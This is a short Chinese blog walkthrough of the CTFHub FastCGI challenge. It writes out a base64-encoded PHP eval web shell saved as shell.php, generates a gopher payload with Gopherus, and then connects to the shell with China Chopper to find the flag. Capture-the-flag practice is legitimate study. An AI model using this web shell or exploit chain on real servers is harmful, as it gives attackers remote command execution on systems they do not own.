首页 > 其他分享 >【CTFHub】FastCGI协议

【CTFHub】FastCGI协议

时间:2024-07-26 22:59:54浏览次数:14  
标签:协议 shell CTFHub kali URL flag 工具 php FastCGI

第一步:开启环境后,打开kali虚拟机,

第二步:生成一句话木马

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

第三步:Gopherus-master工具文件中打开终端,输入以下代码

python2 gopherus.py --exploit fastcgi

 

第四步将kali里面生成的代码复制进CTF在线工具-在线URL编码|URL解码编码

第五步:复制到地址栏中

 第六步:打开中国菜刀工具访问/shell.php

第七步:在查到的文件里面找到flag提交

第八步: 找到flag

标签:协议,shell,CTFHub,kali,URL,flag,工具,php,FastCGI
From: https://blog.csdn.net/weixin_57240513/article/details/140671287

相关文章

  • QT网络编程(二)——TCP协议工作原理及实战
    目录引言一、TCP协议基础知识1.TCP协议特点2.TCP连接的三个阶段3.三次握手和四次挥手二、Qt中的TCP编程1.引入Qt网络模块2.QTcpServer类常用函数3.QTcpSocket类常用函数三、TCP网络通信流程TCP服务器TCP客户端四、实战示例UI界面核心代码运行结果......
  • (BS ISO 11898-1:2015)CAN_FD 总线协议详解5- MAC子层描述1
    目录5.MAC子层描述5.1总则5.2MAC子层的服务5.2.1服务描述5.2.2服务原语规范5.2.2.1概述5.2.2.2MA_Data.Request5.2.2.3MA_Data.Indication功能MA_Data.Indication 原始的语义收到原始的效果5.2.2.4MA_Data.Confirm功能MA_Data.Confirm 原始的语义5.2.......
  • 【计算机网络】ARP协议分析实验
    一:实验目的1:了解IP地址和MAC地址之间的关系。2:掌握ARP命令的使用。3:掌握ARP协议的工作细节。4:了解ARP欺骗的原理和相关的攻击防范方法。二:实验仪器设备及软件硬件:RCMS-C服务器、网线、Windows2019/2003操作系统的计算机等。软件:记事本、WireShark、Chrome浏览器等。......
  • SSRF伪协议
    学习自0x003SSRF信息收集File伪协议_哔哩哔哩_bilibili​​​​​​0x004SSRF信息收集Dict伪协议_哔哩哔哩_bilibili0x005SSRF信息收集Http伪协议_哔哩哔哩_bilibili0x006SSRF利用Gopher伪协议学习_哔哩哔哩_bilibilifile://从文件系统中获取文件内容,如file:///etc/pas......
  • 基于RS485的Modbus协议
    RS485:用来传输数据,RS485是一种差分传输的串行通信标准,以其强大的抗干扰能力、长距离传输和多点通信能力,在工业控制领域得到广泛应用。RS485使用一对差分信号线(A和B)来传输数据,差分信号能有效抵抗共模干扰,提高通信的可靠性。RS485通信可以是半双工或全双工,具体取决于应用配置。......
  • 企业微信ipad协议:提升群管理效率
    产品说明`企业微信ipad协议`接口提供了企业微信的所有功能,调用简单,ipad协议摆脱了hook形式的需要开启pc客户端的方式,一个服务可支持几百号进行登录,并且不影响pc手机端登录状态,实现三端同时在线;>企业微信hook企业微信iPad协议企微hook接口企微第三方接口企微ipad协议......
  • BGP(Border Gateway Protocol,边界网关协议)劫持是指恶意或非法地篡改BGP路由信息的行为
    BGP(BorderGatewayProtocol,边界网关协议)劫持是指恶意或非法地篡改BGP路由信息的行为。BGP是互联网上用来交换路由信息的主要协议之一,它负责决定网络数据包应该如何从一个网络路由到另一个网络。BGP劫持可以分为两种主要类型:前缀劫持(PrefixHijacking):在前缀劫持中,攻击者发送......
  • oauth2协议
    什么是OAUTH2协议:首先是几个概念问题:资源:用户信息,在微信中存储资源拥有者:用户认证服务:微信负责认证用户的身份,也负责为客户端颁发令牌客户端:携带令牌请求微信获取用户信息仍以微信简单概述来说授权码模式:1.用户扫码登录,网站向用户申请授权(A)2.用户同意授权(B)3.网站获取授......
  • 实现一个自己的OpenFeign 远程调用验证协议--Springboot 自定义拦截器验证请求合法性-
    Springboot如何实现一个自定义的拦截器处理系统发出的请求以及接收到的请求(实现一个用于feign远程调用验证的简单协议)文章目录Springboot如何实现一个自定义的拦截器处理系统发出的请求以及接收到的请求(实现一个用于feign远程调用验证的简单协议)**实现Feign拦截器的意......
  • 财务知识-简述对赌协议
    财务知识-简述对赌协议......